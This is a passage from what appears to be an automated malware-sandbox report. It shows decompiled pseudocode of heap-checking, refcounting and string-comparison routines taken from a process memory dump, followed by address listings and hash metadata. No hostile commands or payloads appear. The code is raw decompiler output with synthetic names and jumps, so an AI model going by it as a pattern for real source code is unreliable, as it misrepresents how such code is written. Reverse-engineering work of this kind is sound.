				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x52a5898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x52a58b0 = _t128;
								 *0x52a58b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x52a58b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x52a58bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x52a58bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x52a58b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x52a5898 = 7;
										return _t75;
									} else {
										 *0x52a5898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x52a5898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                                              0x05271002
                                              0x0527100c
                                              0x0527100f
                                              0x05271012
                                              0x05271018
                                              0x00000000
                                              0x0527102e
                                              0x05271030
                                              0x00000000
                                              0x05271032
                                              0x05271032
                                              0x05271038
                                              0x05271038
                                              0x0527121e
                                              0x052711ff
                                              0x05271205
                                              0x05271207
                                              0x0527120c
                                              0x0527120e
                                              0x05271210
                                              0x05271212
                                              0x05271212
                                              0x05271210
                                              0x0527121c
                                              0x0527121c
                                              0x05271228
                                              0x05271228
                                              0x0527101c
                                              0x0527101c
                                              0x0527101c
                                              0x0527101f
                                              0x05271022
                                              0x05271025
                                              0x0527102c
                                              0x0527102c
                                              0x00000000
                                              0x0527102c
                                              0x05271027
                                              0x0527102a
                                              0x0527103f
                                              0x0527103f
                                              0x05271042
                                              0x05271044
                                              0x05271047
                                              0x05271049
                                              0x0527104c
                                              0x0527104e
                                              0x05271088
                                              0x05271088
                                              0x0527108a
                                              0x0527108d
                                              0x0527108f
                                              0x05271091
                                              0x05271091
                                              0x05271093
                                              0x05271095
                                              0x05271097
                                              0x052710c8
                                              0x052710cb
                                              0x052710ce
                                              0x052710d0
                                              0x052710f4
                                              0x052710f4
                                              0x052710fa
                                              0x05271100
                                              0x05271102
                                              0x05271150
                                              0x05271150
                                              0x05271154
                                              0x05271167
                                              0x0527116a
                                              0x0527116a
                                              0x05271156
                                              0x05271156
                                              0x05271158
                                              0x0527115b
                                              0x0527115d
                                              0x0527115f
                                              0x0527115f
                                              0x0527115f
                                              0x05271162
                                              0x05271162
                                              0x0527116c
                                              0x0527116f
                                              0x05271171
                                              0x0527117b
                                              0x0527117b
                                              0x0527117d
                                              0x05271183
                                              0x05271183
                                              0x05271186
                                              0x05271188
                                              0x05271199
                                              0x0527118a
                                              0x0527118a
                                              0x0527118c
                                              0x0527118f
                                              0x05271191
                                              0x05271191
                                              0x05271191
                                              0x05271194
                                              0x05271194
                                              0x0527119c
                                              0x052711a2
                                              0x052711a8
                                              0x052711ac
                                              0x052711af
                                              0x052711c7
                                              0x052711b1
                                              0x052711b1
                                              0x052711b4
                                              0x052711b7
                                              0x052711b9
                                              0x052711b9
                                              0x052711b9
                                              0x052711bc
                                              0x052711c2
                                              0x052711c2
                                              0x052711cb
                                              0x052711ce
                                              0x052711d4
                                              0x052711e7
                                              0x052711ed
                                              0x052711ef
                                              0x00000000
                                              0x00000000
                                              0x052711f1
                                              0x00000000
                                              0x052711d6
                                              0x052711d6
                                              0x00000000
                                              0x052711d6
                                              0x052711d4
                                              0x05271104
                                              0x05271106
                                              0x00000000
                                              0x00000000
                                              0x05271108
                                              0x0527110c
                                              0x0527111d
                                              0x0527110e
                                              0x0527110e
                                              0x05271110
                                              0x05271113
                                              0x05271115
                                              0x05271115
                                              0x05271115
                                              0x05271118
                                              0x05271118
                                              0x05271126
                                              0x0527113a
                                              0x0527113d
                                              0x0527113f
                                              0x00000000
                                              0x05271141
                                              0x05271141
                                              0x00000000
                                              0x05271141
                                              0x0527113f
                                              0x052710d6
                                              0x052710d9
                                              0x052710dd
                                              0x052710e3
                                              0x052710e6
                                              0x052710e9
                                              0x00000000
                                              0x00000000
                                              0x052710ee
                                              0x052710f0
                                              0x052710f2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x052710f2
                                              0x00000000
                                              0x05271099
                                              0x05271099
                                              0x0527109c
                                              0x0527109c
                                              0x0527109e
                                              0x052710a0
                                              0x052710b3
                                              0x052710a2
                                              0x052710a2
                                              0x052710a4
                                              0x052710a7
                                              0x052710a9
                                              0x052710ab
                                              0x052710ab
                                              0x052710ab
                                              0x052710ae
                                              0x052710ae
                                              0x052710b6
                                              0x052710b9
                                              0x00000000
                                              0x00000000
                                              0x052710be
                                              0x052710c1
                                              0x052710c3
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x052710c3
                                              0x052710c5
                                              0x00000000
                                              0x052710c5
                                              0x05271097
                                              0x05271050
                                              0x05271053
                                              0x05271056
                                              0x05271059
                                              0x0527105c
                                              0x0527105e
                                              0x05271060
                                              0x05271062
                                              0x05271064
                                              0x05271064
                                              0x05271062
                                              0x05271066
                                              0x05271069
                                              0x0527106b
                                              0x0527106d
                                              0x0527106f
                                              0x05271076
                                              0x05271076
                                              0x05271076
                                              0x00000000
                                              0x05271076
                                              0x05271071
                                              0x05271074
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05271074
                                              0x05271079
                                              0x05271079
                                              0x0527107b
                                              0x0527107b
                                              0x0527107f
                                              0x05271082
                                              0x05271085
                                              0x00000000
                                              0x05271085
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87e3d75a887edaedc11d172d9b2a7e7145b2d985e3c59ebac3e4ddd07465f4bd
                                              • Instruction ID: 6449f31fe9f33f60fa8f3bae1b3789e464efdc86a37ab646ed19ba29354b0f54
                                              • Opcode Fuzzy Hash: 87e3d75a887edaedc11d172d9b2a7e7145b2d985e3c59ebac3e4ddd07465f4bd
                                              • Instruction Fuzzy Hash: D971B134A2476ACFCB24CF56D48067AB7F1FF44301B24446EE98A8B680D771E9A0DB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051B52A5 Relevance: .2, Instructions: 161COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E051B52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E051CEEF0(0x52a79a0);
					_t104 =  *0x52a8210; // 0x3452d68
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x30000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E051CEB70(_t93, 0x52a79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E051F9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E051CEEF0(0x52a79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E051CEB70(0, 0x52a79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x452d8002
								_t13 = _t104 + 0xc; // 0x3452d75
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E051EF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E051CEEF0(0x52a79a0);
									__eflags =  *0x52a8210 - _t104; // 0x3452d68
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x52a8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2003452d
											_t95 =  *((intOrPtr*)( *_t37));
											E05234888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E051CEB70(_t95, 0x52a79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E051F95D0();
											L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E051F95D0();
											L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E051CEB70(_t93, 0x52a79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E051F95D0();
										L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E051F95D0();
										L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2003452d
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x452d8002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E051EF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                              0x051b52a5
                                              0x051b52ad
                                              0x051b52b0
                                              0x051b52b3
                                              0x051b52b7
                                              0x051b52ba
                                              0x051b52bf
                                              0x051b52c4
                                              0x051b52cc
                                              0x00000000
                                              0x00000000
                                              0x051b52ce
                                              0x051b52d1
                                              0x051b52d9
                                              0x051b52dd
                                              0x051b52e7
                                              0x051b52f7
                                              0x051b52f9
                                              0x051b52fd
                                              0x05210dcf
                                              0x05210dd5
                                              0x05210dd6
                                              0x05210dd7
                                              0x05210dd8
                                              0x05210dd9
                                              0x05210dde
                                              0x05210ddf
                                              0x05210de0
                                              0x05210de1
                                              0x05210de2
                                              0x05210de2
                                              0x05210de5
                                              0x05210dea
                                              0x05210dec
                                              0x05210f60
                                              0x05210f64
                                              0x05210f70
                                              0x05210f76
                                              0x05210f79
                                              0x05210f79
                                              0x00000000
                                              0x05210f64
                                              0x05210df2
                                              0x05210df7
                                              0x05210e04
                                              0x05210e04
                                              0x05210e0d
                                              0x05210e0d
                                              0x05210e10
                                              0x05210e1a
                                              0x05210e1c
                                              0x05210e4c
                                              0x05210e52
                                              0x05210e61
                                              0x05210e67
                                              0x05210e6b
                                              0x05210e70
                                              0x05210e76
                                              0x05210ed7
                                              0x05210edc
                                              0x05210ee0
                                              0x05210ee6
                                              0x05210eea
                                              0x05210eed
                                              0x05210ef0
                                              0x05210ef3
                                              0x05210ef6
                                              0x05210ef9
                                              0x05210efb
                                              0x05210efe
                                              0x05210f01
                                              0x05210f01
                                              0x05210f0b
                                              0x05210f12
                                              0x05210f16
                                              0x05210f18
                                              0x05210f18
                                              0x05210f1b
                                              0x05210f2c
                                              0x05210f31
                                              0x05210f31
                                              0x05210f35
                                              0x05210f39
                                              0x05210f3a
                                              0x05210f3c
                                              0x05210f3c
                                              0x05210f3f
                                              0x05210f50
                                              0x05210f55
                                              0x05210f55
                                              0x05210f59
                                              0x051b52eb
                                              0x051b52f1
                                              0x051b52f1
                                              0x05210e7d
                                              0x05210e84
                                              0x05210e88
                                              0x05210e8a
                                              0x05210e8a
                                              0x05210e8d
                                              0x05210e9e
                                              0x05210ea3
                                              0x05210ea3
                                              0x05210ea7
                                              0x05210eaf
                                              0x05210eb3
                                              0x05210eb9
                                              0x05210eb9
                                              0x05210ebc
                                              0x05210ecd
                                              0x05210ecd
                                              0x00000000
                                              0x05210eb3
                                              0x05210e1e
                                              0x05210e21
                                              0x05210e25
                                              0x05210e2b
                                              0x05210e2f
                                              0x05210e30
                                              0x05210e3a
                                              0x05210e3f
                                              0x05210e41
                                              0x00000000
                                              0x00000000
                                              0x05210e47
                                              0x00000000
                                              0x05210e47
                                              0x05210df9
                                              0x05210dfe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05210dfe
                                              0x051b5303
                                              0x051b5307
                                              0x00000000
                                              0x051b5309
                                              0x00000000
                                              0x051b5309
                                              0x051b5307
                                              0x051b52e9
                                              0x051b52e9
                                              0x00000000
                                              0x051b52e9
                                              0x051b530e
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d359c3c449081397f654303da69c1011cc11c72b8aa7f4f8d14c8e8e51dae947
                                              • Instruction ID: c5197ca9c8a0e07f74204a8038e01dd1bf2ae8892a5b0bdcd3525d20199629c4
                                              • Opcode Fuzzy Hash: d359c3c449081397f654303da69c1011cc11c72b8aa7f4f8d14c8e8e51dae947
                                              • Instruction Fuzzy Hash: 85510E31215342EFD721EF24C889B67BBE6FF54710F14095EE88983652E7B0E844CBA6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E2AE4 Relevance: .2, Instructions: 159COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051E2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x52a8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x52a8208; // 0x52a8207
				_t8 = _t57 + 0x52a8208; // 0x52a8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x52a8450; // 0x34517ee
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x52a821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x52a6d5c; // 0x7fe90654
							_t72 =  *0x52a6d5c; // 0x7fe90654
							_t75 =  *0x52a6d5c; // 0x7fe90654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x52a6d5c; // 0x7fe90654
							_t84 =  *0x52a6d5c; // 0x7fe90654
							_t87 =  *0x52a6d5c; // 0x7fe90654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E051FF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                              0x051e2ae4
                                              0x051e2aec
                                              0x051e2aef
                                              0x051e2af4
                                              0x051e2af7
                                              0x051e2afd
                                              0x051e2b92
                                              0x051e2b92
                                              0x051e2b97
                                              0x051e2b9c
                                              0x051e2b9c
                                              0x051e2b03
                                              0x051e2b06
                                              0x051e2b09
                                              0x051e2b09
                                              0x051e2b0f
                                              0x051e2b15
                                              0x051e2b15
                                              0x051e2b1b
                                              0x051e2b1e
                                              0x051e2b21
                                              0x051e2b26
                                              0x051e2b29
                                              0x051e2b81
                                              0x051e2b84
                                              0x051e2c0e
                                              0x051e2c15
                                              0x051e2c24
                                              0x051e2c24
                                              0x051e2b8a
                                              0x051e2b8a
                                              0x051e2b8a
                                              0x051e2b8a
                                              0x051e2b90
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051e2b4a
                                              0x051e2b4a
                                              0x051e2b4d
                                              0x051e2b53
                                              0x00000000
                                              0x00000000
                                              0x051e2b55
                                              0x051e2b58
                                              0x051e2bb7
                                              0x05225d1b
                                              0x05225d37
                                              0x05225d47
                                              0x05225d53
                                              0x051e2bbd
                                              0x051e2bbd
                                              0x051e2bbd
                                              0x051e2bb7
                                              0x051e2b5d
                                              0x051e2c2f
                                              0x05225d5b
                                              0x05225d77
                                              0x05225d87
                                              0x05225d93
                                              0x051e2c35
                                              0x051e2c35
                                              0x051e2c35
                                              0x051e2c2f
                                              0x051e2b65
                                              0x051e2b9f
                                              0x051e2ba2
                                              0x051e2b67
                                              0x051e2b67
                                              0x051e2b69
                                              0x051e2b6b
                                              0x051e2b6e
                                              0x051e2bc9
                                              0x051e2bcc
                                              0x051e2bcf
                                              0x051e2bd4
                                              0x051e2bd6
                                              0x051e2bd6
                                              0x051e2bdb
                                              0x051e2c02
                                              0x051e2c05
                                              0x051e2c07
                                              0x00000000
                                              0x051e2c07
                                              0x051e2be0
                                              0x051e2c00
                                              0x051e2c3f
                                              0x051e2c3f
                                              0x00000000
                                              0x051e2c00
                                              0x051e2be5
                                              0x051e2be7
                                              0x051e2bec
                                              0x051e2bf4
                                              0x051e2bf6
                                              0x00000000
                                              0x051e2bf6
                                              0x051e2b70
                                              0x051e2b76
                                              0x051e2b2b
                                              0x051e2b2b
                                              0x051e2b2d
                                              0x051e2b2f
                                              0x051e2b32
                                              0x051e2b35
                                              0x051e2b3a
                                              0x00000000
                                              0x051e2b40
                                              0x051e2b43
                                              0x051e2b45
                                              0x051e2b47
                                              0x051e2b4a
                                              0x051e2b4d
                                              0x051e2b53
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051e2b53
                                              0x051e2b78
                                              0x051e2b78
                                              0x051e2b7b
                                              0x051e2b7e
                                              0x00000000
                                              0x051e2b7e
                                              0x051e2b76
                                              0x051e2ba5
                                              0x051e2ba5
                                              0x051e2ba8
                                              0x051e2bad
                                              0x00000000
                                              0x00000000
                                              0x051e2baf
                                              0x051e2baf
                                              0x051e2bc2
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
